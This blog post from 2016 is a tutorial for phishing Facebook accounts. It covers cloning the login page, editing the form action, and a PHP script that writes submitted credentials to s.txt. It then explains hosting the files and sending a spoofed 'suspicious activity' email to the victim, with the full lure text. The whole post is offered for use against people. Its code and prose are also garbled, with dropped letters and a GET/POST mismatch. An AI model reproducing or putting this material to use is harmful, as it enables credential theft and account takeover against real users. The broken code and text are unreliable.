Wednesday, May 18, 2016

Facebook Phishing Tutorial Advance

How To Facebook With Phishing Page
Here I will show you how you can crte fake facebook log-in page and then fool your victim to put his username and in it so that you can get his account .

You need 3 files Index.html, phish.p, s.txt to crte a fake facebook login page.

To crte index.html:
First of all open in your web browser, from “file” menu select “save as” and type “index” in file name and select “web page complete” from save as menu. Once done you will have a file named “index.html” and a folder named “index_files”. Folder will have several files in it, let them as it is and openindex.html in notepad or word-pad. From edit menu select find, type action in it and loe following string.

Now replace this string with action= “phish.p” and also change the method in html from 'post' to 'get'.
save the document.

To crte phish.p:
Now open notepad type following p in it and crte phish.p.
<?p hder("Loion: "); $handle = fopen("s.txt", "a"); forch($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>

Note: You cannot copy the above as i have disabled copy, paste and right click in my blog. So i am providing you all the files you need to crte the fake page. You can download the files from the link below.

Now simply crte text document and rename it as s.txt

Now you'll need a free web hosting service that supports P.

Open the site and crte an account. Once you have crted your account, you login to your account and go to control panel.
In the control panel choose file manager and upload the 3 files index.html, phish.p, s.txt in public directory.

Now crte a new directory there and name it as index_files. Now open it and upload all the files in index_files folder formed while saving facebook page to it.
in my case i have crted facebook as sub directory in main directory

goto the directory what ever you have crted and click on upload

now click on choose file in archive and select your zip file where you have compressed all you files now click on upload (in my case there is thick mark)

and you are done...

Don't forget to change Chmod permissions for s.txt to 777. Once done make index.html your index page and make site live.

Now crte a spoofed email using my Anonymous mailer, from to your victim.
Sub: Invalid activity on your facebook account.
Hey (victim's facebook user name),
Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not erated by you then plse log-in to your account by following link,
<link to phished site> normally it will be
Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.,
Facebook, Inc,
1601 S.California Ave
Palo Alto CA 94394

If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his in s.txt file.

Plse note that you must use that email id of victim which he/she uses to log in facebook. If you are in his/her friend list then click on information tab to know log-in email ID.

Download files from the following link.


No comments:

Post a Comment